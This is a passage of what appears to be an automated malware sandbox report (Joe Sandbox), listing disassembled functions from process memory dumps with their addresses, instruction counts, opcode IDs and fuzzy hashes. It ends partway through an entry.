                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 64cea6b4383ffa85412a27e9f427b92a2cecec0fc8fbf5f077850c86f03f94c1
                                                                            • Instruction ID: 888f39249f86484f085d0d1de958ec37a8d2a48bc17f1a42b63b47abddb5f30b
                                                                            • Opcode Fuzzy Hash: 64cea6b4383ffa85412a27e9f427b92a2cecec0fc8fbf5f077850c86f03f94c1
                                                                            • Instruction Fuzzy Hash: F5116B3130D50B8FFB29AA68D4252F97390EF453A1F11427BE409CB6E1DB39A6408390
                                                                            Function 00007FFD9BC9168E Relevance: .1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c81a887a67a633809ce2b2cba39b8ae34c9d608a67a431156f76111c8f29a78e
                                                                            • Instruction ID: c93bac97e13791c9ddf6b603bd36c80fe180770a963a47c973f11a0bd02284c5
                                                                            • Opcode Fuzzy Hash: c81a887a67a633809ce2b2cba39b8ae34c9d608a67a431156f76111c8f29a78e
                                                                            • Instruction Fuzzy Hash: 9211AB3130D60F4FF729AA68D4262F973D0EF403A0F11423BE409CB6E2DB39A6408390
                                                                            Function 00007FFD9B8A0C38 Relevance: .1, Instructions: 57COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e3d86b5880040099bfaaa6ad7a090ddfde234d183dfe00534f068e704b13cc34
                                                                            • Instruction ID: 08bc8b74e9f5d75f63b1960cf55cf4b4dc0cbd445931b6eb60a0365f8d3d70c3
                                                                            • Opcode Fuzzy Hash: e3d86b5880040099bfaaa6ad7a090ddfde234d183dfe00534f068e704b13cc34
                                                                            • Instruction Fuzzy Hash: 7A11E731B1E68D8EE712DBA888611AC7BB0EF56710F0641F3C048CB1E3D93866068790
                                                                            Function 00007FFD9BC90CF9 Relevance: .1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 881b083cba89095e45b28f3cb65c54af1ef1e6f8f3d89e803274847cab428798
                                                                            • Instruction ID: cfebb7b1beda94729d26258a4a6f6dd34091623245b3a12c4bf7cfa44f856cdb
                                                                            • Opcode Fuzzy Hash: 881b083cba89095e45b28f3cb65c54af1ef1e6f8f3d89e803274847cab428798
                                                                            • Instruction Fuzzy Hash: AC01D231F0DA4C4FEB69E7E898625ECB7E0EF49320F15017AE04DC72E7DA2869028300
                                                                            Function 00007FFD9B8A0C40 Relevance: .1, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0faddae7d783cac31a58192115abc36dc5310585a9b4c792c2d41ef7bb0168e2
                                                                            • Instruction ID: 3e8c0b6861d041ffbbcf3eb9f2fba85d87bcce9a1184944c08d47c2ec9080c88
                                                                            • Opcode Fuzzy Hash: 0faddae7d783cac31a58192115abc36dc5310585a9b4c792c2d41ef7bb0168e2
                                                                            • Instruction Fuzzy Hash: 7611C231B1E28D8EE712DBA4886009D7BB0EF16710F0641F7C048CB2E2D93866458790
                                                                            Function 00007FFD9BC90C68 Relevance: .0, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3b7eb85403e8dd11e00d7e762e70e5a0ba670284abcb893344deb633d0b9196d
                                                                            • Instruction ID: fcf8e2d39b292c4b60e22987f92af12c32b4c977e9eea935735283b9e4624f99
                                                                            • Opcode Fuzzy Hash: 3b7eb85403e8dd11e00d7e762e70e5a0ba670284abcb893344deb633d0b9196d
                                                                            • Instruction Fuzzy Hash: F701BC31B0D91E8FDB68E69CA4619FCF3E1EF48720B11427AD04ED3696CA20BD1187C4
                                                                            Function 00007FFD9BC9681C Relevance: .0, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2764bf13c68fff1bbf1e141d0166d0220a1e663ba7017373c79688037cb40606
                                                                            • Instruction ID: 976d867e887a5d90232efee35b8e4862d1d1c59914047e6168834d62b6a0ebdd
                                                                            • Opcode Fuzzy Hash: 2764bf13c68fff1bbf1e141d0166d0220a1e663ba7017373c79688037cb40606
                                                                            • Instruction Fuzzy Hash: D701F520B1DA6A5FD719A77058259EAB790EF4529074046BBD08BCB4D2EF28A505C390
                                                                            Function 00007FFD9B8A0C48 Relevance: .0, Instructions: 45COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bdf5a5973df30eaec77130463b28994aaf9a23f95de8dcbc8814d217bee9dd8e
                                                                            • Instruction ID: ac6d9af5f3eae2ac1faca5a6d4e50c3ef908679b3329bc5cf5b2c1c1312890d6
                                                                            • Opcode Fuzzy Hash: bdf5a5973df30eaec77130463b28994aaf9a23f95de8dcbc8814d217bee9dd8e
                                                                            • Instruction Fuzzy Hash: 47018031E1E28D9FE722DBA4C9A049D7FB0EF1A710F1641F7C048DB2E2E93866458791
                                                                            Function 00007FFD9B8A6C1A Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 18cf3f48d95a71c6f79250973695fff6d4c9016402dfccc7444f3c4e3a5f020a
                                                                            • Instruction ID: 7922275232e9f717ba0ab44215582172231eaf5e88e28fdd2aa9f71912e44e45
                                                                            • Opcode Fuzzy Hash: 18cf3f48d95a71c6f79250973695fff6d4c9016402dfccc7444f3c4e3a5f020a
                                                                            • Instruction Fuzzy Hash: 2B01F434A08A19CFCB65DF58C495AA973B1FB5C300F4105A9D00ED72A4CA34AA45CB81
                                                                            Function 00007FFD9B8A3696 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction ID: eeeef986aacd1d76c13630bc85f21309c31058b07114c9165cf0e641f5058245
                                                                            • Opcode Fuzzy Hash: 65e8be95179b52e3161798d2a7ed0564b4310aa8133acfcddd3b2d38e3e24a30
                                                                            • Instruction Fuzzy Hash: E4013630E1D91E8AEB78EB54CC646F873A1EB58711F1601B9C44ED32A1CD786AC18A10
                                                                            Function 00007FFD9BC94E82 Relevance: .0, Instructions: 39COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e176496dbb7ddaa15a84fa4dfd9030057769c6630eae4d12b3a56162d10c546
                                                                            • Instruction ID: c3268a86a50c297aa376fdb30e0561379d6c18037f4f7ecdad9dd4c06d0aeca2
                                                                            • Opcode Fuzzy Hash: 8e176496dbb7ddaa15a84fa4dfd9030057769c6630eae4d12b3a56162d10c546
                                                                            • Instruction Fuzzy Hash: 29F0963154F3C9AFE7229BB088614ED7FB4AF43210B1A01FAD485C70B6D62C1756C761
                                                                            Function 00007FFD9BC96678 Relevance: .0, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16a0e2598666f1b3bb1310b7d3fceecc408aae4dc8b20a3fa02d6e7be6bd47f0
                                                                            • Instruction ID: a52ca985c5f27089f7cdc3468a3c1d1270272c5f954df8ea547144c43d76dc6a
                                                                            • Opcode Fuzzy Hash: 16a0e2598666f1b3bb1310b7d3fceecc408aae4dc8b20a3fa02d6e7be6bd47f0
                                                                            • Instruction Fuzzy Hash: 64F0B421B0F50F8EFB3565B095311FD26509F42390F22017AE84EC65E9C929770153A2
                                                                            Function 00007FFD9B8A63FD Relevance: .0, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6dd9cd3213a896cf790c4d9ce7bc352bba50e1bed93a52f4d2e193527653a186
                                                                            • Instruction ID: 6877917942b54bcac1f61bb3ad01cd9a2c871e56c657232143543245aa58a6f4
                                                                            • Opcode Fuzzy Hash: 6dd9cd3213a896cf790c4d9ce7bc352bba50e1bed93a52f4d2e193527653a186
                                                                            • Instruction Fuzzy Hash: 25E01220E0A92E47FBE4A384CC60BB96265EB58300F1901B8D90ED33D1CD38AF41C755
                                                                            Function 00007FFD9B8A0B95 Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                            • Instruction ID: 7a3d8438e5e7b7cd6afd87a7f47f94eedc7459a36a948ae5598053eaf14d433d
                                                                            • Opcode Fuzzy Hash: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                            • Instruction Fuzzy Hash: 17D0A73061954E4FE601F778D8599547BD0FB1F211BD914E1D008C7561D50489558B00
                                                                            Function 00007FFD9B8A06A5 Relevance: .0, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: edd84586ca2309a73ea2e425c3da0eb4cf66a5a33340d999415eb4e510eeee48
                                                                            • Instruction ID: 626ab1cc16f32f566b947832a8364e63e58d9c940c6dd526c759cbc70771e3b8
                                                                            • Opcode Fuzzy Hash: edd84586ca2309a73ea2e425c3da0eb4cf66a5a33340d999415eb4e510eeee48
                                                                            • Instruction Fuzzy Hash: A8C04C05F6B61F01F83577EE98660ACA1446BDDF14FDB1172D64D500E1AC4D26DA0177
                                                                            Function 00007FFD9B8A0B18 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                            • Instruction ID: da1caf116fea712c97993945747a162353b6aab94d45414e28cbda317d86b4de
                                                                            • Opcode Fuzzy Hash: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                            • Instruction Fuzzy Hash: C5C04C305118198FCA54EB6DC98595476E0FB0E215BD60190E40DC7171E65ADD95C741
                                                                            Function 00007FFD9B8A1280 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction ID: 9b47e03330b0279760603c110b9764c22ca0a3ae42c2f5dbb0fba9f4fd43436e
                                                                            • Opcode Fuzzy Hash: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction Fuzzy Hash: F9C08C3055180C8FC958EB68C89482433A0FB0D300BC20090E008C7170E229ECC1C740
                                                                            Function 00007FFD9BC9166B Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2db0abfd7043c5346f8301486abd97a43e4486f59773c0113c882262dc8c6a12
                                                                            • Instruction ID: 4b8141cb90712da11d066c4bb029945d09070f4f21661d266d3ec49a43a7ba93
                                                                            • Opcode Fuzzy Hash: 2db0abfd7043c5346f8301486abd97a43e4486f59773c0113c882262dc8c6a12
                                                                            • Instruction Fuzzy Hash: B6D09214F0F64FA5F23946E1417223D25A49F01700F2B00B9C09F418E9C9287A016612
                                                                            Function 00007FFD9B8A1E15 Relevance: .0, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 13a18f1651d18de52d21e253c295852664d7785f5605033bf59d753becb48cfb
                                                                            • Instruction ID: 62689906b94b9468f68ddf52041db7c625a54136fc98519d12f226f462f56bca
                                                                            • Opcode Fuzzy Hash: 13a18f1651d18de52d21e253c295852664d7785f5605033bf59d753becb48cfb
                                                                            • Instruction Fuzzy Hash: 1AC04C01F1DD2A46F3596618C5715BE44539B94798FD50178E01DDB2CECE1D5A0202C7
                                                                            Function 00007FFD9B8A0540 Relevance: .0, Instructions: 9COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction ID: d8b18aba3cbfb82436ad7c2d23bf8ec6aa04b42e48ae24d012edf6af18dbea9c
                                                                            • Opcode Fuzzy Hash: 2b78bf1186c45fc3c7d81c293246713ae118e9436eb60826fa9e68670449f7b4
                                                                            • Instruction Fuzzy Hash: 94B01234E6B70F42DB3833F50852474F054AF0E204FD202B4D409401B1F86F62D5C2A2
                                                                            Function 00007FFD9B8A37E4 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction ID: c1fe9e5674a7ace64fea33bd91a1b0fa74d8d3e9ddf6219bc829ea4d43b02c41
                                                                            • Opcode Fuzzy Hash: 53c70a6c0ebeaaabb0c14e47e9f9b531c1a27ffe34ac2e4c652d76d0da44782b
                                                                            • Instruction Fuzzy Hash: 91B02B00E1A01C02E33057B084101BD31041F09204F0B4076400AE3082CD1811014510
                                                                            Function 00007FFD9B8A0520 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction ID: c2ac2572d87d9986e69222b53e6881b82c092c0b2272e984449ddd7a3df2170b
                                                                            • Opcode Fuzzy Hash: d4c6600cef925dc529f846fc1ca0cc0fd5c55d5dfc1650271f53e3a99bc49c88
                                                                            • Instruction Fuzzy Hash: 05B01200D7B80E04E82433F50A5A07474005B4D110FD20470D40C40095984F26A441A2
                                                                            Function 00007FFD9B8A06C8 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2513957135.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9b8a0000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction ID: 6de1d2277ab83a2daeb4e823ef4ba1cb1def5de7f855eb2a766427613e65a0ff
                                                                            • Opcode Fuzzy Hash: 96fe4010113da6c11f3e8a2dacffdcb6673fd4f3f15f9a27ae6a2de406a7b73a
                                                                            • Instruction Fuzzy Hash: D2B01200D6740F00E42433FB0C92064B0846B4C300FCE1170D40D50091A88D26990263
                                                                            Function 00007FFD9BC95B8C Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 27f186080308ea63a2b176e30dafabc5f0d19b2c0d269edd51ad8099f50218cd
                                                                            • Instruction ID: 01e8fc5f4c28a5a00da0849c09899b08e7aea8d12edb175e2d5074f4f5dd35a7
                                                                            • Opcode Fuzzy Hash: 27f186080308ea63a2b176e30dafabc5f0d19b2c0d269edd51ad8099f50218cd
                                                                            • Instruction Fuzzy Hash: 01C0924AF2F38BABFA7216F48A7403E05A00F46610B170972D14ACE1E7EE5C7E086265
                                                                            Function 00007FFD9BC90BA1 Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000038.00000002.2703690953.00007FFD9BC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC90000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_56_2_7ffd9bc90000_WtHZilDMhVnOIkoIfPBLn.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a5e25236ac023755a9ca75abfdefcbf79a073ddfcaa7259dd4f091b1027e4ddb
                                                                            • Instruction ID: 5de8f1d4d9452dd8f3cd921424c88f89e100a4ef3feef84f091b8ae26837c735
                                                                            • Opcode Fuzzy Hash: a5e25236ac023755a9ca75abfdefcbf79a073ddfcaa7259dd4f091b1027e4ddb
                                                                            • Instruction Fuzzy Hash: BDB01200F2E30F93F13001F0047103C20410B44F08F120570D14B861EBDC8C3A401150

                                                                            Executed Functions

                                                                            Function 00007FFD9B880D4C Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 5[_H
                                                                            • API String ID: 0-3279724263
                                                                            • Opcode ID: 8a2142fca355063db5f755ad32f94dc7e7e3b6cd935d8eec3a51d0ee7b77f2de
                                                                            • Instruction ID: 22d14ae6c13ad80c43fb7aa0c6ff3f95bcf8b451350e5ee9e7322ce767f14c21
                                                                            • Opcode Fuzzy Hash: 8a2142fca355063db5f755ad32f94dc7e7e3b6cd935d8eec3a51d0ee7b77f2de
                                                                            • Instruction Fuzzy Hash: 8F910175A1DE9D4FE799DB6888657A97FE1FF9A300F4100BAD099C72E2DB782801C701
                                                                            Function 00007FFD9B8C0C21 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2521997384.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: rL_H
                                                                            • API String ID: 0-3705031574
                                                                            • Opcode ID: c5b1778226aecb302343d67d3f93e76fcc75dd61120f2df381dc53ac8b06b513
                                                                            • Instruction ID: 36c91304e000df97cde3fcbccdda7c3af2abf0b76e0d36108baed6915aa3b47d
                                                                            • Opcode Fuzzy Hash: c5b1778226aecb302343d67d3f93e76fcc75dd61120f2df381dc53ac8b06b513
                                                                            • Instruction Fuzzy Hash: EF5149A1B2EA8E0FDFA9EB68982567977D1FF59740B0501FBD00DC71E7ED28A9018340
                                                                            Function 00007FFD9BC72188 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: b7c8d9f544fc142b97ae302856b7995d6eef99b7c23428064867e9f4eb78c8bf
                                                                            • Instruction ID: 5e0baac00108eab0670d836c9134110311c1fa828106ebc75db28c9d491ea8c4
                                                                            • Opcode Fuzzy Hash: b7c8d9f544fc142b97ae302856b7995d6eef99b7c23428064867e9f4eb78c8bf
                                                                            • Instruction Fuzzy Hash: A2517571E1A54E8FDB69DBE8C4A55FCB7B1FF59300F1140BAD01ADB296DA346A01CB40
                                                                            Function 00007FFD9BC77198 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000003B.00000002.2724353781.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_59_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: 8674ee36d74d2b9da15ab3a7dea6feb111ab657727f8e7b1cd7da532716c1a36
                                                                            • Instruction ID: 20a9052be35a0427e1a9c2f1a375f4a6606c3d521fc5843d49ba40d06fe404dd
